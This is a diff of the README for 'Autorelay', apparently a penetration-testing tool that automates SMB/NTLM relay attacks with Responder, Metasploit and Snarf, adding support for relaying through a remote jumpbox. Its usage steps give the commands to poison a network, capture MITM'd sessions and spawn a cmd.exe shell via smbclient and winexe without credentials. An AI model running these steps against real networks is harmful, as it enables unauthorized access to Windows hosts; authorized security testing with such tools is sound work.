0v3rm1nd-dr4g0n/autorelay/README.md

 # Autorelay

-Automatically performs the SMB relay attack.
+Automatically performs the SMB relay attack either locally or on a remote device.
 Uses Responder to poison, Metasploit for HTTP NTLM relay (rather than just SMB relay), and Snarf for the MITM'ing.
+When using locally, only requires an interface and an nmap XML file of the target network to determine SMB hosts.
+When used for SMB relaying on a jumpbox, requires the IP address of the jumpbox.

 ## Usage

 1. pip install -r requirements

+####Remote

+2. python autoresp.py -d [remote server internal IP] -x [nmap xml output file from the remote network] -i [remote device interface]

+####Local

-2. python autoresp.py -i [interface] -x [nmap xml file]
+2. python autoresp.py -x [nmap xml output file from the remote network] -i [interface]

-3. Point your browser to http://localhost:4001 and refresh it periodically to see your MITM'd connections
+3. Point your local browser to http://localhost:4001 and refresh it periodically to see your MITM'd connections

 4. After a connection is expired (or you expire it), click "choose"

+5. Run this command locally if relaying locally or run it on the jumpbox if you're relaying remotely: smbclient -U a%a //127.0.0.1

-5. On the remote device run: winexe //127.0.0.1 -U "a%a" cmd.exe
+6. Alternatively, if you gain admin rights through the SMB connection spawn a shell with: winexe //127.0.0.1 -U "a%a" cmd.exe

-6. If your SMB connection had admin rights, you now have a shell without any credentials.